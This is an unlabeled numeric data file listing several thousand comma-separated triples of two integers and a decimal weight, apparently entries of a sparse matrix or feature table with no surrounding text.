(113,9828,0.23331),(117,9828,0.23331),(123,9828,0.23331),(112,9828,0.46662),(35,9829,0.93331),(35,9830,1.02669),(120,9831,0.46669),(35,9831,1.86676),(35,9832,2.05338),(35,9833,1.09669),(35,9834,1.09669),(35,9835,1.12),(35,9836,1.19),(35,9837,1.00331),(35,9838,1.09669),(35,9839,0.02331),(105,9839,0.04662),(116,9839,0.04662),(123,9839,0.04662),(125,9839,0.06993),(112,9839,0.09324),(119,9839,0.11655),(106,9839,0.13986),(118,9839,0.13986),(120,9839,0.18648),(104,9839,0.20979),(103,9839,0.25641),(110,9839,0.30303),(113,9839,0.30303),(117,9839,0.41958),(35,9840,0.86331),(105,9840,0.86331),(118,9840,0.86331),(35,9841,1.09669),(35,9842,0.91),(35,9843,1.05),(35,9844,0.88669),(35,9845,1.12),(35,9846,0.95669),(35,9847,1.09669),(35,9848,1.02669),(35,9849,1.09669),(35,9850,1.00331),(35,9851,1.21331),(112,9852,0.91),(35,9852,1.82),(104,9852,1.82),(35,9853,1.19),(35,9854,1.12),(35,9855,1.00331),(103,9855,1.00331),(133,9855,1.00331),(35,9856,1.23669),(35,9857,1.09669),(35,9858,1.37669),(35,9859,0.93331),(120,9859,1.86662),(35,9860,1.19),(35,9861,1.72662),(35,9862,0.95669),(35,9863,0.98),(35,9864,1.02669),(35,9865,1.09669),(35,9866,0.95669),(35,9867,1.19),(35,9868,1.05),(35,9869,1.30669),(35,9870,1.86662),(35,9871,1.02669),(35,9872,1.02669),(35,9873,1.96),(35,9874,1.19),(35,9875,1.12),(35,9876,0.91),(110,9876,2.73),(35,9877,0.98),(35,9878,0.95669),(35,9879,1.05),(35,9880,0.95669),(35,9881,1.12),(35,9882,0.93331),(35,9883,1.12),(104,9884,0.02331),(125,9884,0.02331),(35,9884,0.04662),(105,9884,0.04662),(118,9884,0.04662),(120,9884,0.04662),(123,9884,0.04662),(107,9884,0.06993),(116,9884,0.06993),(119,9884,0.06993),(128,9884,0.06993),(110,9884,0.09324),(117,9884,0.09324),(113,9884,0.11655),(112,9884,0.16317),(103,9884,0.18648),(106,9884,0.51282),(35,9885,0.86331),(35,9886,0.98),(35,9887,1.02669),(35,9888,1.19),(35,9889,0.02919),(103,9889,0.02919),(110,9889,0.02919),(118,9889,0.02919),(125,9889,0.02919),(126,9889,0.02919),(35,9890,0.95669),(35,9891,1.09669),(35,9892,0.93331),(35,9893,1.07331),(35,9894,0.81669),(68,9894,0.81669),(103,9894,0.81669),(105,9894,0.81669),(125,9894,0.81669),(104,9894,1.63338),(113,9894,1.63338),(116,9894,1.63338),(120,9894,1.63338),(112,9894,3.26676),(110,9894,7.35021),(35,9895,1.05),(35,9896,0.88669),(106,9896,0.88669),(35,9897,0.98),(35,9898,0.93331),(35,9899,1.02669),(35,9900,1.00331),(35,9901,0.84),(116,9901,0.84),(118,9901,0.84),(120,9901,0.84),(123,9901,0.84),(125,9901,0.84),(128,9901,0.84),(133,9901,0.84),(113,9901,1.68),(126,9901,1.68),(68,9901,2.52),(117,9901,2.52),(119,9901,3.36),(103,9901,4.2),(110,9901,6.72),(35,9902,1.09669),(123,9903,0.32669),(134,9903,0.32669),(40,9903,0.65338),(35,9903,0.98007),(55,9903,1.72679),(121,9903,1.72679),(35,9904,2.05338),(35,9905,1.12),(35,9906,1.19),(35,9907,0.98),(35,9908,1.23669),(112,10591,0.23331),(103,10710,0.02331),(117,10710,0.02331),(125,10710,0.02331),(128,10710,0.02331),(110,10710,0.06993),(120,10710,0.09324),(103,10719,0.88669),(118,10719,0.88669),(118,10720,0.95669),(113,10723,0.98),(113,10725,1.77338),(68,10729,0.02919),(103,10729,0.02919),(106,10729,0.02919),(113,10729,0.02919),(118,10729,0.02919),(119,10729,0.02919),(120,10729,0.02919),(123,10729,0.02919),(110,10729,0.14595),(113,10732,0.32669),(116,10732,0.32669),(117,10732,0.32669),(121,10732,0.32669),(119,10732,0.65338),(133,10732,0.65338),(116,10733,0.95669),(117,10733,0.95669),(52,10735,0.02331),(68,10735,0.02331),(103,10735,0.02331),(105,10735,0.02331),(110,10735,0.02331),(112,10735,0.02331),(117,10735,0.02331),(123,10735,0.02331),(133,10735,0.02331),(104,10735,0.04662),(107,10735,0.04662),(113,10735,0.04662),(125,10735,0.04662),(120,10735,0.09324),(117,10736,0.86331),(104,10738,0.79331),(120,10738,0.79331),(110,10744,0.23331),(116,10744,0.23331),(40,10828,0.42),(120,10828,0.42),(40,10829,1.16669),(40,10830,1.35331),(40,10831,0.46669),(114,10831,0.46669),(110,10831,1.40007),(40,10832,1.12),(40,10833,1.28331),(40,10905,1.12),(40,10906,1.19),(40,10907,1.14331),(40,10908,1.35331),(40,10909,0.91),(40,10910,0.98),(40,10911,0.93331),(40,10912,0.98),(40,10913,2.05338),(121,10913,5.42679),(40,10914,1.26),(40,10915,1.12),(111,11414,0.07),(126,11414,0.07),(109,11414,0.14),(114,11414,0.2),(128,11414,0.49),(68,11657,0.93331),(133,11657,0.93331),(58,11739,0.04669),(68,11739,0.04669),(123,11739,0.04669),(52,11739,0.18009),(103,11739,0.18676),(110,11739,0.32683),(121,11739,0.32683),(109,11739,0.51359),(114,11739,0.65366),(111,11739,2.42788),(110,12126,0.46662),(52,12126,0.6666),(52,12178,0.91),(52,12179,1.12),(52,12180,2.4666),(52,12181,2.7334),(52,12182,1.12008),(52,12183,1.02669),(52,12184,1.07331),(52,12185,2.32339),(52,12186,2.66339),(52,12187,0.23331),(123,12187,0.23331),(68,12187,0.46662),(110,12187,3.26634),(52,12188,0.98),(52,12189,1.09669),(52,12190,0.42),(52,12191,1.02669),(52,12192,1.26),(52,12251,0.18669),(52,12252,0.95669),(52,12253,1.00331),(52,12254,0.95669),(52,12255,1.00331),(52,12256,0.32669),(52,12257,1.07331),(52,12258,1.16669),(52,12259,0.95669),(52,12260,2.6),(52,12261,3),(55,12418,1.09669),(55,12419,1.19),(103,12465,0.28),(55,12465,1.48),(55,12466,5.42679),(55,12467,6.90679),(55,12468,0.51331),(55,12469,1.12),(55,12470,1.33),(55,12471,0.28),(104,12471,0.28),(112,12471,0.28),(103,12471,0.56),(105,12471,0.56),(120,12471,0.56),(55,12472,0.93331),(55,12473,1.12),(55,12474,6.04321),(55,12475,7.4),(58,12590,0.84),(58,12591,1.00331),(58,12592,0.23331),(110,12592,0.69993),(58,12593,1.07331),(58,12594,1.19),(68,13501,0.95669),(68,13502,1.14331),(68,13503,0.18669),(109,13503,0.18669),(120,13503,0.18669),(107,13503,0.37338),(111,13503,0.74676),(68,13504,1.09669),(68,13505,1.37669),(68,13506,0.42),(104,13506,0.42),(68,13507,1.00331),(68,13508,1.12),(68,13509,0.28),(113,13509,0.28),(68,13510,0.93331),(68,13511,1.14331),(68,13512,0.65338),(68,13513,0.93331),(68,13514,1.02669),(68,13515,0.95669),(68,13516,1.23669),(68,13517,0.91),(110,13517,1.82),(68,13518,1.02669),(68,13519,0.93331),(68,13520,1.09669),(68,13521,0.28),(68,13522,0.88669),(68,13523,0.98),(68,13635,1.05),(68,13636,1.14331),(68,13637,1.07331),(68,13638,1.14331),(68,13639,0.95669),(68,13640,1.16669),(68,13641,0.88669),(68,13642,0.95669),(68,13643,3.45324),(68,13644,4.10676),(68,13645,0.93331),(68,13646,1.23669),(68,13647,0.88669),(120,13647,0.88669),(68,13648,0.95669),(68,13649,2.14662),(68,13650,1.23669),(68,13651,1.28331),(68,13652,1.05),(68,13653,0.88669),(68,13654,1.07331),(68,13655,1.02669),(68,13656,1.12),(68,13657,0.98),(68,13658,1.05),(68,13659,0.95669),(68,13660,1.07331),(68,13661,0.02331),(116,13661,0.02331),(123,13661,0.02331),(125,13661,0.02331),(119,13661,0.04662),(103,13661,0.06993),(113,13661,0.06993),(117,13661,0.13986),(68,13662,0.88669),(113,13662,0.88669),(68,13663,1.05),(68,13664,0.93331),(68,13665,1.00331),(68,13666,1.05),(68,13667,0.88669),(103,13667,0.88669),(68,13668,0.95669),(68,13669,0.91),(68,13670,1.00331),(68,13671,0.93331),(68,13672,1.07331),(68,13673,0.95669),(68,13674,1.86662),(68,13675,0.51331),(68,13676,1.12),(68,13677,1.21331),(110,13743,0.07),(119,13743,0.07),(128,13743,0.14),(77,13743,0.2),(111,13743,0.28),(103,13978,0.42),(110,14006,0.37331),(113,14011,0.56),(103,14257,0.86331),(113,14257,0.86331),(117,14257,0.86331),(119,14257,0.86331),(106,14257,1.72662),(110,14257,1.72662),(110,14261,0.91),(120,14281,0.91),(113,14285,0.02331),(116,14285,0.02331),(103,14285,0.04662),(112,14285,0.04662),(113,14288,0.93331),(113,14300,0.86331),(106,14482,0.23331),(107,14482,0.23331),(109,14482,0.23331),(110,14482,0.23331),(114,14482,0.23331),(117,14482,0.23331),(118,14482,0.23331),(125,14482,0.23331),(133,14482,0.23331),(120,14482,0.69993),(111,14482,0.93324),(133,14683,0.42),(110,14683,0.84),(133,14688,0.95669),(120,14688,1.91338),(112,14711,0.18669),(123,14711,0.18669),(128,14711,0.18669),(133,14711,0.37338),(103,14711,0.74676),(112,14712,0.86331),(128,14712,0.86331),(133,14712,1.72662),(110,15608,0.84),(119,15608,0.84),(113,15784,0.04669),(118,15784,0.04669),(120,15796,0.37331),(103,15879,0.32669),(103,15880,1.00331),(103,15881,1.14331),(103,15887,0.46669),(103,15888,1.12),(103,15889,1.23669),(103,16503,2.52),(110,16503,5.88),(103,16504,0.95669),(103,16505,1.02669),(103,16506,0.98),(103,16507,0.88669),(103,16508,1.12),(103,16509,0.32669),(103,16510,1.02669),(103,16511,1.09669),(103,16512,0.28),(103,16513,0.95669),(103,16514,1.14331),(103,16515,0.37331),(103,16516,1.05),(103,16517,1.14331),(103,16518,1.02669),(103,16519,1.14331),(103,16520,0.28),(113,16520,0.28),(103,16521,0.95669),(103,16522,1.02669),(103,16523,0.28),(117,16523,0.56),(123,16523,0.56),(103,16524,0.91),(103,16525,1.00331),(123,16526,0.18669),(125,16526,0.18669),(120,16526,0.37338),(126,16526,0.37338),(103,16526,0.74676),(103,16527,0.91),(103,16528,1.02669),(103,16529,0.91),(103,16530,0.98),(103,16531,0.93331),(103,16532,1.07331),(103,16533,0.91),(103,16534,1.00331),(103,16535,0.46669),(104,16535,0.46669),(103,16536,1.14331),(103,16537,1.23669),(103,16538,0.32669),(117,16538,0.32669),(103,16539,0.98),(103,16540,1.19),(103,16541,0.37331),(112,16541,0.37331),(103,16542,1.00331),(103,16543,1.12),(103,16544,0.42),(103,16545,0.98),(103,16546,1.05),(103,16547,0.51331),(103,16548,1.05),(103,16549,1.30669),(103,16550,0.18669),(103,16551,0.88669),(103,16552,1.00331),(103,17686,0.46662),(119,17686,1.23321),(103,17687,0.86331),(103,17688,0.95669),(103,17689,0.91),(103,17690,1.07331),(103,17691,0.86331),(103,17692,0.98),(103,17693,0.28),(110,17693,0.28),(112,17693,0.28),(103,17694,0.88669),(103,17695,1.02669),(103,17696,0.14),(103,17697,0.86331),(103,17698,0.95669),(103,17699,0.32669),(103,17700,0.95669),(103,17701,1.05),(103,17702,0.42),(103,17703,1.09669),(103,17704,1.26),(103,17705,0.32669),(103,17706,0.95669),(103,17707,1.19),(103,17708,0.18669),(103,17709,0.88669),(103,17710,0.98),(103,17711,0.98),(103,17712,1.19),(103,17713,0.88669),(103,17714,0.95669),(103,17715,0.88669),(103,17716,0.98),(103,17717,0.84),(104,17717,0.84),(112,17717,0.84),(103,17718,1.05),(103,17719,0.91),(103,17720,1.07331),(103,17721,0.91),(103,17722,0.95669),(103,17723,1.02669),(103,17724,0.88669),(113,17724,0.88669),(117,17724,0.88669),(120,17724,0.88669),(123,17724,0.88669),(103,17725,1.00331),(103,17726,0.91),(118,17726,0.91),(120,17726,0.91),(103,17727,1.07331),(103,17728,0.86331),(103,17729,0.98),(103,17730,0.93331),(103,17731,1.05),(103,17732,0.88669),(110,17732,0.88669),(117,17732,1.77338),(103,17733,0.98),(110,17733,0.98),(103,17734,0.91),(103,17735,1.16669),(103,17736,0.93331),(103,17737,1.09669),(103,17738,0.91),(103,17739,1.05),(103,17740,0.86331),(103,17741,1.00331),(103,17742,0.91),(103,17743,1.05),(103,17744,0.86331),(103,17745,0.95669),(103,17746,0.88669),(110,17746,0.88669),(116,17746,0.88669),(118,17746,0.88669),(103,17747,0.95669),(103,17748,0.95669),(103,17749,1.02669),(103,17750,0.93331),(103,17751,1.07331),(103,17752,1.00331),(103,17753,1.00331),(103,17754,1.07331),(103,17755,0.81669),(110,17755,0.81669),(103,17756,0.98),(103,17757,0.93331),(103,17758,1.05),(103,17759,1.09669),(103,17760,0.88669),(103,17761,1.02669),(103,17762,1.05),(103,17763,1.21331),(103,17764,0.98),(103,17765,1.07331),(120,17766,0.88669),(103,17766,7.98021),(103,17767,0.98),(103,17768,4.78345),(103,17769,1.05),(103,17770,1.00331),(103,17771,1.00331),(103,17772,1.86662),(103,17773,1.12),(103,17774,1.21331),(103,17775,0.91),(103,17776,0.98),(103,17777,0.88669),(103,17778,0.95669),(103,17779,0.93331),(103,17780,0.98),(103,17781,0.88669),(106,17781,0.88669),(112,17781,0.88669),(103,17782,0.95669),(103,17783,0.91),(119,17783,0.91),(103,17784,1.00331),(103,17785,1.02669),(104,17785,1.02669),(120,17785,2.05338),(103,17786,1.14331),(103,17787,0.84),(120,17787,0.84),(103,17788,0.98),(103,17789,0.95669),(103,17790,1.12),(103,17791,0.91),(110,17791,0.91),(103,17792,1.00331),(103,17793,0.93331),(103,17794,1.02669),(103,17795,0.93331),(103,17796,0.98),(103,17797,0.91),(103,17798,1.05),(103,17799,0.91),(103,17800,0.98),(103,17801,0.93331),(103,17802,1.00331),(103,17803,0.88669),(103,17804,0.98),(103,17805,0.88669),(103,17806,1.07331),(103,17807,0.91),(103,17808,1.02669),(103,17809,0.86331),(110,17809,0.86331),(113,17809,0.86331),(103,17810,0.93331),(110,17810,0.93331),(113,17810,0.93331),(103,17811,0.88669),(103,17812,1.00331),(103,17813,1.12),(103,17814,1.19),(103,17815,0.93331),(103,17816,1.00331),(103,17817,1.82),(103,17818,0.98),(103,17819,1.09669),(103,17820,0.91),(103,17821,1.00331),(103,17822,1.00331),(103,17823,1.14331),(103,17824,0.93331),(103,17825,1.05),(103,17826,0.02919),(112,17826,0.02919),(116,17826,0.02919),(126,17826,0.02919),(113,17826,0.05838),(118,17826,0.05838),(123,17826,0.05838),(125,17826,0.08757),(103,17827,0.88669),(118,17827,0.88669),(123,17827,1.77338),(103,17828,1.07331),(104,17829,0.02331),(126,17829,0.02331),(118,17829,0.04662),(103,17829,0.06993),(110,17829,0.06993),(112,17829,0.06993),(117,17829,0.06993),(120,17829,0.06993),(113,17829,0.11655),(103,17830,0.88669),(103,17831,1.02669),(103,17832,0.95669),(103,17833,1.07331),(103,17834,0.93331),(103,17835,1.12),(103,17836,0.23331),(104,17836,0.23331),(110,17836,0.23331),(112,17836,0.23331),(113,17836,0.23331),(117,17836,0.46662),(103,17837,0.86331),(103,17838,1.05),(103,17839,0.28),(107,17839,0.28),(113,17839,0.28),(116,17839,0.28),(117,17839,0.28),(118,17839,0.28),(120,17839,0.28),(112,17839,0.56),(103,17840,0.95669),(103,17841,1.09669),(103,17842,0.23331),(105,17842,0.23331),(119,17842,0.23331),(125,17842,0.23331),(112,17842,0.46662),(117,17842,0.46662),(103,17843,0.91),(103,17844,1.07331),(103,17845,0.37331),(119,17845,0.37331),(125,17845,0.37331),(103,17846,1.02669),(119,17846,1.02669),(125,17846,1.02669),(103,17847,1.26),(103,17848,0.88669),(103,17849,0.95669),(103,17850,1.00331),(103,17851,1.09669),(103,17852,0.98),(103,17853,1.23669),(103,17854,0.98),(103,17855,1.05),(103,17856,0.88669),(103,17857,1.07331),(103,17858,1.00331),(103,17859,1.19),(103,17860,0.88669),(103,17861,0.98),(103,17862,0.88669),(103,17863,0.98),(103,17864,0.91),(103,17865,1.00331),(103,17866,0.56),(103,17867,0.91),(103,17868,1.12),(103,17869,0.93331),(103,17870,1.07331),(103,17871,0.98),(103,17872,1.07331),(103,17873,0.02919),(104,17873,0.02919),(110,17873,0.02919),(123,17873,0.02919),(103,17874,0.91),(103,17875,1.00331),(103,17876,0.91),(103,17877,0.98),(103,17878,0.84),(103,17879,0.93331),(103,17880,0.84),(103,17881,0.91),(103,17882,0.95669),(103,17883,1.00331),(103,17884,0.86331),(112,17884,0.86331),(117,17884,0.86331),(103,17885,0.93331),(103,17886,1.00331),(103,17887,1.19),(103,17888,0.91),(103,17889,1.02669),(103,17890,0.86331),(103,17891,0.93331),(103,17892,0.86331),(125,17892,1.72662),(103,17893,0.98),(103,17894,0.84),(103,17895,0.93331),(103,17896,0.91),(103,17897,0.98),(103,17898,0.88669),(103,17899,1.00331),(103,17900,0.86331),(103,17901,0.98),(103,17902,0.84),(103,17903,0.98),(103,17904,0.93331),(103,17905,1.02669),(103,17906,0.84),(103,17907,0.93331),(103,17908,0.95669),(103,17909,1.19),(103,17910,0.86331),(103,17911,0.95669),(103,17912,0.84),(120,17912,0.84),(103,17913,0.88669),(103,17914,0.86331),(103,17915,1.14331),(103,17916,0.86331),(103,17917,0.95669),(103,17918,0.91),(103,17919,1.07331),(103,17920,1.00331),(103,17921,1.05),(103,17922,0.91),(103,17923,0.98),(103,17924,0.86331),(103,17925,0.93331),(103,17926,0.84),(110,17926,1.68),(120,17926,1.68),(103,17927,0.91),(103,17928,0.93331),(103,17929,1.05),(103,17930,0.91),(103,17931,1.00331),(103,17932,0.86331),(110,17932,0.86331),(113,17932,0.86331),(116,17932,0.86331),(117,17932,0.86331),(103,17933,1.00331),(103,17934,0.23331),(116,17934,0.23331),(118,17934,0.23331),(128,17934,0.23331),(103,17935,0.88669),(103,17936,1.07331),(103,17937,0.42),(103,17938,0.98),(103,17939,1.09669),(103,17940,0.18669),(113,17940,0.18669),(103,17941,0.95669),(103,17942,1.12),(103,17943,0.69993),(103,17944,0.93331),(103,17945,1.02669),(103,17946,2.00662),(103,17947,1.09669),(103,17948,1.19),(103,17949,0.51331),(103,17950,1.14331),(103,17951,1.26),(103,17952,0.32669),(103,17953,1.05),(103,17954,1.14331),(103,17955,0.51331),(116,17955,0.51331),(103,17956,1.07331),(103,17957,1.23669),(103,17958,0.32669),(103,17959,0.95669),(103,17960,1.05),(103,17961,0.32669),(103,17962,0.98),(103,17963,1.09669),(103,17964,0.23331),(103,17965,0.93331),(103,17966,1.12),(103,17967,0.14),(104,17967,0.14),(110,17967,0.14),(112,17967,0.14),(116,17967,0.14),(120,17967,0.14),(119,17967,0.28),(126,17967,0.28),(103,17968,0.86331),(103,17969,0.93331),(103,17970,0.91),(103,17971,1.02669),(103,17972,0.86331),(103,17973,0.95669),(103,17974,1.00331),(103,17975,1.07331),(103,17976,0.91),(103,17977,0.98),(103,17978,0.23331),(113,17978,0.23331),(103,17979,0.93331),(103,17980,1.09669),(104,18255,0.18669),(104,18256,0.95669),(104,18257,1.07331),(104,18258,0.18669),(104,18259,0.95669),(104,18260,1.02669),(104,18496,0.37331),(104,18497,1.05),(104,18498,1.19),(104,18499,1.21331),(104,18500,1.4),(104,18501,0.46669),(110,18501,0.46669),(104,18502,1.05),(104,18503,1.19),(104,18504,1.00331),(104,18505,1.07331),(104,18506,0.37331),(104,18507,0.98),(104,18508,1.14331),(104,19093,0.98),(104,19094,1.12),(126,19095,0.23331),(104,19095,0.69993),(104,19096,0.86331),(104,19097,0.98),(104,19098,0.98),(104,19099,1.09669),(104,19100,0.91),(104,19101,1.09669),(104,19102,0.18669),(126,19102,0.18669),(104,19103,0.86331),(104,19104,1.05),(104,19105,1.96),(104,19106,1.23669),(104,19107,1.14331),(104,19108,0.91),(126,19108,0.91),(104,19109,0.98),(104,19110,0.91),(104,19111,0.95669),(104,19112,0.42),(104,19113,1.05),(104,19114,1.21331),(104,19115,0.95669),(104,19116,1.05),(104,19117,0.95669),(104,19118,1.07331),(104,19119,0.95669),(104,19120,0.86331),(117,19120,0.86331),(104,19121,1.05),(104,19122,0.93331),(104,19123,1.05),(104,19124,0.95669),(104,19125,1.02669),(104,19126,0.93331),(104,19127,1.05),(104,19128,0.93331),(104,19129,1.07331),(104,19130,0.91),(116,19130,0.91),(104,19131,1.00331),(104,19132,1.00331),(104,19133,1.21331),(104,19134,0.84),(104,19135,0.95669),(104,19136,0.84),(104,19137,0.93331),(104,19138,0.91),(104,19139,1.02669),(104,19140,0.98),(104,19141,1.05),(104,19142,0.93331),(104,19143,1.09669),(104,19144,1.86662),(104,19145,1.12),(104,19146,1.05),(104,19147,0.95669),(104,19148,1.02669),(104,19149,1.77338),(104,19150,1.02669),(104,19151,1.00331),(104,19152,0.88669),(104,19153,1.14331),(104,19154,0.86331),(104,19155,1.00331),(104,19156,0.95669),(104,19157,1.07331),(104,19158,1.19),(104,19159,1.86662),(104,19160,1.00331),(104,19161,1.05),(104,19162,0.88669),(123,19162,0.88669),(110,19162,1.77338),(104,19163,1.00331),(104,19164,1.00331),(104,19165,0.98),(112,19165,0.98),(104,19166,1.07331),(120,19167,0.32669),(125,19167,0.32669),(104,19167,0.65338),(104,19168,0.95669),(104,19169,1.02669),(104,19170,0.95669),(104,19171,1.16669),(104,19172,0.88669),(104,19173,0.98),(104,19174,0.88669),(104,19175,0.98),(104,19176,0.23331),(123,19176,0.23331),(107,19176,0.46662),(110,19176,0.69993),(104,19177,0.95669),(104,19178,1.09669),(104,19179,0.98),(104,19180,1.05),(104,19181,0.23331),(104,19182,0.91),(104,19183,1.07331),(104,19184,0.98),(104,19185,1.21331),(104,19186,0.88669),(104,19187,1.14331),(104,19188,0.98),(104,19189,1.14331),(104,19190,1.00331),(110,19191,0.86331),(112,19191,0.86331),(120,19191,0.86331),(125,19191,0.86331),(104,19191,1.72662),(104,19192,0.98),(104,19193,0.84),(104,19194,1.00331),(104,19195,0.98),(104,19196,1.28331),(104,19197,0.86331),(104,19198,0.98),(104,19199,0.91),(104,19200,0.98),(104,19201,0.86331),(104,19202,1.12),(104,19203,0.88669),(104,19204,0.95669),(104,19205,0.32669),(116,19205,0.32669),(104,19206,0.95669),(104,19207,0.18669),(126,19207,0.18669),(120,19207,0.37338),(104,19208,0.84),(104,19209,1.07331),(104,19210,0.32669),(104,19211,1.02669),(104,19212,1.21331),(104,19213,0.02331),(125,19213,0.02331),(104,19214,0.91),(104,19215,0.95669),(104,19216,0.98007),(104,19217,0.93331),(104,19218,1.07331),(104,19219,0.93331),(104,19220,1.02669),(104,19221,0.98),(104,19222,1.12),(104,19223,0.88669),(104,19224,1.02669),(105,19357,0.14),(111,19357,0.14),(105,19358,0.81669),(105,19359,0.98),(105,19360,0.14),(105,19361,0.84),(105,19362,1.02669),(105,19739,0.28),(105,19740,0.88669),(105,19741,0.98),(105,19742,0.14),(105,19743,0.95669),(105,19744,1.16669),(105,19745,0.28),(105,19746,0.93331),(105,19747,1.02669),(105,19748,0.09331),(109,19748,0.09331),(107,19748,0.18662),(111,19748,0.18662),(105,19749,0.95669),(105,19750,1.05),(105,19751,0.23331),(117,19751,0.23331),(105,19752,0.95669),(105,19753,1.02669),(105,19754,0.32669),(105,19755,1.02669),(105,19756,1.16669),(105,19757,0.18669),(105,19758,0.95669),(105,19759,1.07331),(105,19760,0.42),(105,19761,1.07331),(105,19762,1.23669),(105,19763,0.23331),(110,19763,0.23331),(112,19763,0.23331),(125,19763,0.23331),(105,19764,0.91),(112,19764,0.91),(105,19765,1.09669),(105,19766,0.42),(105,19767,1.00331),(105,19768,1.12),(105,20476,0.32669),(105,20477,0.98),(105,20478,1.12),(105,20479,0.23331),(105,20480,1.07331),(105,20481,1.19),(105,20482,0.32669),(105,20483,0.98),(105,20484,1.05),(105,20485,0.18669),(105,20486,0.88669),(105,20487,1.07331),(105,20488,0.14),(125,20488,0.28),(105,20489,0.95669),(105,20490,1.09669),(105,20491,0.91),(105,20492,1.00331),(105,20493,0.95669),(105,20494,0.93331),(105,20495,1.07331),(105,20496,0.95669),(105,20497,1.02669),(105,20498,0.86331),(105,20499,0.98),(105,20500,1.02669),(105,20501,1.09669),(105,20502,0.91),(105,20503,1.00331),(105,20504,1.82),(105,20505,2.1),(105,20506,0.93331),(105,20507,1.07331),(105,20508,0.95669),(105,20509,1.02669),(105,20510,0.86331),(105,20511,1.00331),(105,20512,1.82),(105,20513,1.05),(105,20514,1.05),(105,20515,0.93331),(105,20516,1.12),(105,20517,0.91),(105,20518,0.98),(105,20519,0.93331),(105,20520,1.02669),(105,20521,0.88669),(105,20522,0.95669),(105,20523,0.98),(105,20524,1.12),(105,20525,0.86331),(105,20526,0.88669),(105,20527,1.14331),(105,20528,1.82),(105,20529,0.98),(105,20530,0.98),(105,20531,0.88669),(105,20532,1.05),(105,20533,0.88669),(105,20534,1.02669),(105,20535,0.86331),(119,20535,0.86331),(105,20536,0.93331),(105,20537,0.88669),(105,20538,1.00331),(105,20539,0.88669),(105,20540,1.05),(105,20541,0.95669),(105,20542,1.09669),(105,20543,0.88669),(105,20544,1.00331),(105,20545,0.95669),(105,20546,1.14331),(105,20547,1.05),(105,20548,1.14331),(105,20549,0.93331),(105,20550,0.98),(105,20551,0.86331),(105,20552,0.98),(105,20553,0.95669),(105,20554,1.21331),(105,20555,0.95669),(105,20556,1.07331),(105,20557,0.88669),(105,20558,1.09669),(105,20559,0.86331),(105,20560,1.00331),(106,20561,0.91),(116,20561,0.91),(118,20561,0.91),(105,20561,1.82),(105,20562,1.05),(105,20563,0.98),(105,20564,0.86331),(105,20565,1.05),(105,20566,0.93331),(105,20567,1.00331),(105,20568,0.91),(105,20569,1.09669),(112,20570,0.23331),(126,20570,0.23331),(105,20570,0.46662),(107,20570,0.46662),(119,20570,0.46662),(105,20571,0.98),(105,20572,1.02669),(105,20573,0.95669),(105,20574,1.09669),(105,20575,0.46669),(105,20576,1.09669),(105,20577,1.19),(105,20578,0.93331),(105,20579,1.14331),(105,20580,0.14),(105,20581,0.86331),(105,20582,0.95669),(105,20583,1.05),(105,20584,0.81669),(110,20584,0.81669),(117,20584,0.81669),(120,20584,0.81669),(125,20584,1.63338),(105,20585,0.86331),(105,20586,0.84),(105,20587,1.02669),(105,20588,0.98),(105,20589,1.02669),(105,20590,0.84),(106,20590,0.84),(113,20590,0.84),(123,20590,0.84),(105,20591,0.98),(105,20592,0.84),(105,20593,0.95669),(105,20594,0.88669),(105,20595,0.98),(105,20596,0.88669),(105,20597,0.98),(105,20598,0.86331),(105,20599,0.93331),(105,20600,0.88669),(105,20601,0.95669),(105,20602,0.93331),(105,20603,1.16669),(105,20604,0.18669),(105,20605,1.00331),(105,20606,1.21331),(105,20607,0.32669),(105,20608,1.00331),(105,20609,1.14331),(105,20610,0.14),(105,20611,0.91),(105,20612,0.95669),(105,20613,0.23331),(126,20613,0.23331),(105,20614,1.05),(105,20615,1.14331),(105,20616,0.46669),(105,20617,1.00331),(105,20618,1.09669),(105,20619,0.28),(110,20619,0.28),(111,20619,0.56),(105,20620,0.91),(105,20621,0.98),(105,20622,0.23331),(105,20623,0.91),(105,20624,1.02669),(105,20625,0.23331),(120,20625,0.23331),(107,20625,0.93324),(105,20626,0.88669),(105,20627,1.05),(106,21126,0.28),(110,21126,0.28),(126,21126,0.28),(106,21127,0.91),(106,21128,1.05),(106,21129,0.37331),(116,21129,0.37331),(106,21130,0.93331),(106,21131,1.00331),(106,21132,0.32669),(106,21133,0.95669),(106,21134,1.14331),(106,21135,0.32669),(106,21136,0.93331),(106,21137,1.02669),(106,21138,0.51331),(106,21139,1.14331),(106,21140,1.21331),(106,21141,0.42),(106,21142,1.05),(106,21143,1.16669),(106,21144,0.42),(106,21145,1.02669),(106,21146,1.12),(106,21147,0.28),(106,21148,0.98),(106,21149,1.07331),(106,21150,0.32669),(106,21151,0.98),(106,21152,1.09669),(106,21153,0.18669),(112,21153,0.37338),(106,21154,0.98),(106,21155,1.19),(106,21156,1.02669),(106,21157,1.23669),(106,21158,0.42),(106,21159,1.09669),(106,21160,1.21331),(106,21161,0.14),(128,21161,0.28),(106,21162,0.98),(106,21163,1.16669),(106,21911,0.28),(106,21912,1.00331),(106,21913,1.19),(106,21914,0.18669),(106,21915,0.98),(106,21916,1.14331),(106,21917,0.23331),(106,21918,0.88669),(106,21919,1.00331),(106,21920,0.42),(106,21921,1.00331),(106,21922,1.12),(106,21923,1.00331),(106,21924,1.07331),(106,21925,0.88669),(118,21925,0.88669),(119,21925,0.88669),(106,21926,1.00331),(119,21926,1.00331),(106,21927,1.21331),(106,21928,1.05),(106,21929,0.91),(106,21930,1.07331),(106,21931,1.07331),(106,21932,1.16669),(106,21933,0.88669),(106,21934,1.14331),(106,21935,1.86662),(106,21936,1.09669),(106,21937,1.02669),(106,21938,1.82),(106,21939,1.09669),(106,21940,1.02669),(106,21941,0.95669),(106,21942,1.05),(106,21943,0.93331),(106,21944,1.00331),(106,21945,0.93331),(123,21945,0.93331),(106,21946,1.07331),(106,21947,1.05),(106,21948,0.88669),(106,21949,1.02669),(106,21950,0.95669),(106,21951,1.07331),(106,21952,0.95669),(106,21953,1.02669),(106,21954,3.64),(106,21955,0.98),(106,21956,1.07331),(106,21957,1.12),(106,21958,1.00331),(106,21959,1.00331),(106,21960,1.07331),(106,21961,0.91),(106,21962,1.09669),(106,21963,1.12),(106,21964,1.28331),(106,21965,1.14331),(106,21966,0.98),(106,21967,1.09669),(106,21968,0.93331),(106,21969,1.00331),(106,21970,0.98),(106,21971,1.12),(106,21972,1.02669),(106,21973,1.12),(106,21974,1.07331),(106,21975,1.26),(106,21976,1.02669),(106,21977,1.21331),(106,21978,1.00331),(106,21979,1.33),(106,21980,0.95669),(106,21981,1.05),(106,21982,1.86662),(106,21983,2.05338),(106,21984,0.86331),(112,21984,0.86331),(118,21984,0.86331),(119,21984,0.86331)